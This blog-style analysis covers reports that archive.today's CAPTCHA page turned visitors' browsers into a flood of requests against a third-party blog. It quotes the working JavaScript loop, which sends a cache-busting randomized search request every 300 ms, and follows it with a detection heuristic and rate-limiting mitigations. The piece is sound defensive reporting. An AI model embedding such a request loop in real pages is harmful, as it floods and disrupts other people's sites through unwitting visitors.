A Blog Under Siege: archive.today Reportedly Turning Users Into DDoS Proxies

February 2026 · analysis · tags: archive.today, DDoS, web-archives

TL;DR: Multiple community reports say archive.today’s CAPTCHA page executed client-side JavaScript that requested a third-party blog’s search endpoint roughly every 300 ms for as long as the page stayed open, generating DDoS-style load from ordinary visitors’ browsers. See the original write-up and community threads linked below.

What was observed

According to the initial report, the CAPTCHA page contained a short `setInterval` script that called the targeted blog’s search URL with a randomized query string roughly every 300 milliseconds. Because each query string was unique, the requests bypassed caching, keeping a steady stream of traffic active while the page was open. A code snippet and screenshots were published by the reporting author. (sources: original report, HN, Reddit)

setInterval(function() {
    // Random base-36 token as the search term: every URL is unique, so
    // neither the browser nor any intermediate cache can deduplicate requests.
    fetch("https://example-blog.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
        referrerPolicy: "no-referrer",  // omit the Referer header, hiding where the request originated
        mode: "no-cors"                 // opaque response; the script never reads it, it only generates load
    });
}, 300);  // repeat roughly every 300 ms for as long as the page stays open
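The randomized query string is the detail that defeats caching, but it also leaves a detectable fingerprint. As a sketch only (the function name and thresholds below are my assumptions, not anything from the report), a search handler could flag query terms shaped like `Math.random().toString(36)` output, which is 1–9 lowercase base-36 characters:

```javascript
// Illustrative heuristic: queries produced by the snippet above are short,
// all lowercase base-36, and (usually) mix digits into the token. Real search
// terms can match too, so treat this as one signal, not a verdict.
function looksLikeRandomQuery(q) {
  return /^[0-9a-z]{1,9}$/.test(q) && /\d/.test(q);
}

console.log(looksLikeRandomQuery("q3k8zp1"));      // true  — short token with digits mixed in
console.log(looksLikeRandomQuery("archive news")); // false — spaces, reads like a real search
console.log(looksLikeRandomQuery("hello"));        // false — letters only, plausibly a word
```

A handler could answer flagged queries with a cheap cached page instead of running a real search, which keeps false positives harmless.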

The original report contains screenshots and a line reference in the CAPTCHA HTML for verification; community conversations also examined the behavior and implications.

Timeline & community reaction

The reporting author traces the activity to around early January 2026, documents email exchanges and remediation attempts, and shows how the blog’s domain was later added to DNS/adblock blocklists, which stopped the client-side requests for many users. Community discussion and validation followed on Hacker News and Reddit.

Why this matters

Client-side code that repeatedly issues requests to third-party sites can turn ordinary visitors into unknowing request sources. For small blogs and low-capacity hosts, that can cause service disruptions, and it raises questions about responsibility for archival tooling and user-facing anti-abuse pages.

Mitigation suggestions (brief)

  • Rate-limit or throttle search endpoints (return HTTP 429 for excessive traffic patterns).
  • Use CDN/WAF rules to catch high-frequency request patterns and block/serve cached responses.
  • Ignore obviously random short search queries server-side or return cheap cached results.
  • Collect request logs (timestamps, headers, user agents, referrers) for abuse reports and forensics.
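The rate-limiting bullet can be sketched as a per-client sliding-window check that a search handler consults before doing any work. The window size, limit, and use of a bare client key here are illustrative assumptions, not recommendations from the report:

```javascript
// Minimal sliding-window rate limiter (sketch). A real deployment would
// evict stale keys and likely sit in a CDN/WAF rule rather than app code.
const WINDOW_MS = 10_000;  // look at the last 10 seconds
const MAX_HITS  = 10;      // a human searcher rarely exceeds this

const hits = new Map();    // client key (e.g. IP) -> recent request timestamps

// Returns the HTTP status a handler should use: 200 to proceed, 429 to refuse.
function checkRate(clientKey, now = Date.now()) {
  const recent = (hits.get(clientKey) || []).filter(t => now - t < WINDOW_MS);
  recent.push(now);
  hits.set(clientKey, recent);
  return recent.length > MAX_HITS ? 429 : 200;
}

// A 300 ms request loop like the reported one crosses the threshold within seconds:
let status;
for (let t = 0; t <= 3300; t += 300) status = checkRate("1.2.3.4", t);
console.log(status); // 429
```

Serving the 429 (or a cached page) costs almost nothing, which is the point: the attack only hurts if each request triggers real search work.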

Sources & discussion
